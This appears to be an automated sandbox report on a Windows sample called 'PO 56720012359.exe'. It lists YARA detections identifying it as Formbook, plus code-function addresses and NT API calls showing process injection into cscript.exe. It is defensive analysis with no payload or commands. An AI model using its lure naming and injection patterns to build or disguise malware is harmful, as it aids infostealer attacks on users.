          Source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: PO 56720012359.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 1.2.PO 56720012359.exe.2d10000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO 56720012359.exe.2d10000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.PO 56720012359.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.PO 56720012359.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO 56720012359.exe.2d10000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO 56720012359.exe.2d10000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.PO 56720012359.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.PO 56720012359.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008B2FCD1_2_008B2FCD
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008BB81D1_2_008BB81D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008BA8511_2_008BA851
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008B90721_2_008B9072
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008B95E41_2_008B95E4
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008B8B001_2_008B8B00
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008B795C1_2_008B795C
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0041C8243_2_0041C824
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0041B9D33_2_0041B9D3
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0041C2543_2_0041C254
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0041CBD23_2_0041CBD2
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_00408C6B3_2_00408C6B
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_00408C703_2_00408C70
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0041CEBE3_2_0041CEBE
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0041BF723_2_0041BF72
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0041B7313_2_0041B731
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_008BB81D3_2_008BB81D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_008BA8513_2_008BA851
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_008B90723_2_008B9072
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_008B795C3_2_008B795C
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_008B8B003_2_008B8B00
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_008B95E43_2_008B95E4
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_008B2FCD3_2_008B2FCD
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013041203_2_01304120
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EF9003_2_012EF900
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A10023_2_013A1002
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013120A03_2_013120A0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B20A83_2_013B20A8
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012FB0903_2_012FB090
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B28EC3_2_013B28EC
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B2B283_2_013B2B28
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131EBB03_2_0131EBB0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013ADBD23_2_013ADBD2
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B22AE3_2_013B22AE
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E0D203_2_012E0D20
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B2D073_2_013B2D07
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B1D553_2_013B1D55
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013125813_2_01312581
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012FD5E03_2_012FD5E0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B25DD3_2_013B25DD
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F841F3_2_012F841F
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013AD4663_2_013AD466
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B1FF13_2_013B1FF1
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01306E303_2_01306E30
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013AD6163_2_013AD616
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B2EF73_2_013B2EF7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05320D2016_2_05320D20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F2D0716_2_053F2D07
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F1D5516_2_053F1D55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535258116_2_05352581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533D5E016_2_0533D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F25DD16_2_053F25DD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533841F16_2_0533841F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053ED46616_2_053ED466
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F1FF116_2_053F1FF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053FDFCE16_2_053FDFCE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05346E3016_2_05346E30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053ED61616_2_053ED616
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F2EF716_2_053F2EF7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534412016_2_05344120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532F90016_2_0532F900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053499BF16_2_053499BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534A83016_2_0534A830
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053FE82416_2_053FE824
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E100216_2_053E1002
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053520A016_2_053520A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F20A816_2_053F20A8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533B09016_2_0533B090
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F28EC16_2_053F28EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F2B2816_2_053F2B28
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534AB4016_2_0534AB40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535EBB016_2_0535EBB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E03DA16_2_053E03DA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053EDBD216_2_053EDBD2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053DFA2B16_2_053DFA2B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F22AE16_2_053F22AE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DDC82416_2_00DDC824
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DDB9D316_2_00DDB9D3
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DDC25416_2_00DDC254
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DC8C7016_2_00DC8C70
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DC8C6B16_2_00DC8C6B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DC2D9016_2_00DC2D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DC2FB016_2_00DC2FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DDBF7216_2_00DDBF72
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DDB73116_2_00DDB731
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: String function: 008B3B40 appears 42 times
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: String function: 012EB150 appears 35 times
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: String function: 008B42A1 appears 32 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0532B150 appears 66 times
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_004181D0 NtCreateFile,3_2_004181D0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_00418280 NtReadFile,3_2_00418280
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_00418300 NtClose,3_2_00418300
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_004183B0 NtAllocateVirtualMemory,3_2_004183B0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_004181CA NtCreateFile,3_2_004181CA
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0041827A NtReadFile,3_2_0041827A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_004182CA NtReadFile,3_2_004182CA
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_004182FA NtClose,3_2_004182FA
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_004183AB NtAllocateVirtualMemory,3_2_004183AB
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_01329910
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013299A0 NtCreateSection,LdrInitializeThunk,3_2_013299A0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329860 NtQuerySystemInformation,LdrInitializeThunk,3_2_01329860
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329840 NtDelayExecution,LdrInitializeThunk,3_2_01329840
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013298F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_013298F0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329A20 NtResumeThread,LdrInitializeThunk,3_2_01329A20
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01329A00
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329A50 NtCreateFile,LdrInitializeThunk,3_2_01329A50
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329540 NtReadFile,LdrInitializeThunk,3_2_01329540
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013295D0 NtClose,LdrInitializeThunk,3_2_013295D0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329710 NtQueryInformationToken,LdrInitializeThunk,3_2_01329710
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013297A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_013297A0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329780 NtMapViewOfSection,LdrInitializeThunk,3_2_01329780
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329FE0 NtCreateMutant,LdrInitializeThunk,3_2_01329FE0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_01329660
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013296E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_013296E0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329950 NtQueueApcThread,3_2_01329950
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013299D0 NtCreateProcessEx,3_2_013299D0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329820 NtEnumerateKey,3_2_01329820
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0132B040 NtSuspendThread,3_2_0132B040
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013298A0 NtWriteVirtualMemory,3_2_013298A0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329B00 NtSetValueKey,3_2_01329B00
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0132A3B0 NtGetContextThread,3_2_0132A3B0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329A10 NtQuerySection,3_2_01329A10
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329A80 NtOpenDirectoryObject,3_2_01329A80
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0132AD30 NtSetContextThread,3_2_0132AD30
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329520 NtWaitForSingleObject,3_2_01329520
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329560 NtWriteFile,3_2_01329560
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013295F0 NtQueryInformationFile,3_2_013295F0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329730 NtQueryVirtualMemory,3_2_01329730
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0132A710 NtOpenProcessToken,3_2_0132A710
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0132A770 NtOpenThread,3_2_0132A770
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329770 NtSetInformationFile,3_2_01329770
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329760 NtOpenProcess,3_2_01329760
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329610 NtEnumerateValueKey,3_2_01329610
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329670 NtQueryInformationProcess,3_2_01329670
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329650 NtQueryValueKey,3_2_01329650
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013296D0 NtCreateKey,3_2_013296D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369540 NtReadFile,LdrInitializeThunk,16_2_05369540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053695D0 NtClose,LdrInitializeThunk,16_2_053695D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369710 NtQueryInformationToken,LdrInitializeThunk,16_2_05369710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369780 NtMapViewOfSection,LdrInitializeThunk,16_2_05369780
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369FE0 NtCreateMutant,LdrInitializeThunk,16_2_05369FE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369660 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_05369660
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369650 NtQueryValueKey,LdrInitializeThunk,16_2_05369650
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053696E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_053696E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053696D0 NtCreateKey,LdrInitializeThunk,16_2_053696D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_05369910
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053699A0 NtCreateSection,LdrInitializeThunk,16_2_053699A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369860 NtQuerySystemInformation,LdrInitializeThunk,16_2_05369860
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369840 NtDelayExecution,LdrInitializeThunk,16_2_05369840
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369A50 NtCreateFile,LdrInitializeThunk,16_2_05369A50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0536AD30 NtSetContextThread,16_2_0536AD30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369520 NtWaitForSingleObject,16_2_05369520
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369560 NtWriteFile,16_2_05369560
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053695F0 NtQueryInformationFile,16_2_053695F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369730 NtQueryVirtualMemory,16_2_05369730
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0536A710 NtOpenProcessToken,16_2_0536A710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0536A770 NtOpenThread,16_2_0536A770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369770 NtSetInformationFile,16_2_05369770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369760 NtOpenProcess,16_2_05369760
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053697A0 NtUnmapViewOfSection,16_2_053697A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369610 NtEnumerateValueKey,16_2_05369610
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369670 NtQueryInformationProcess,16_2_05369670
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369950 NtQueueApcThread,16_2_05369950
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053699D0 NtCreateProcessEx,16_2_053699D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369820 NtEnumerateKey,16_2_05369820
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0536B040 NtSuspendThread,16_2_0536B040
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053698A0 NtWriteVirtualMemory,16_2_053698A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053698F0 NtReadVirtualMemory,16_2_053698F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369B00 NtSetValueKey,16_2_05369B00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0536A3B0 NtGetContextThread,16_2_0536A3B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369A20 NtResumeThread,16_2_05369A20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369A10 NtQuerySection,16_2_05369A10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369A00 NtProtectVirtualMemory,16_2_05369A00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369A80 NtOpenDirectoryObject,16_2_05369A80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD81D0 NtCreateFile,16_2_00DD81D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD8280 NtReadFile,16_2_00DD8280
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD83B0 NtAllocateVirtualMemory,16_2_00DD83B0
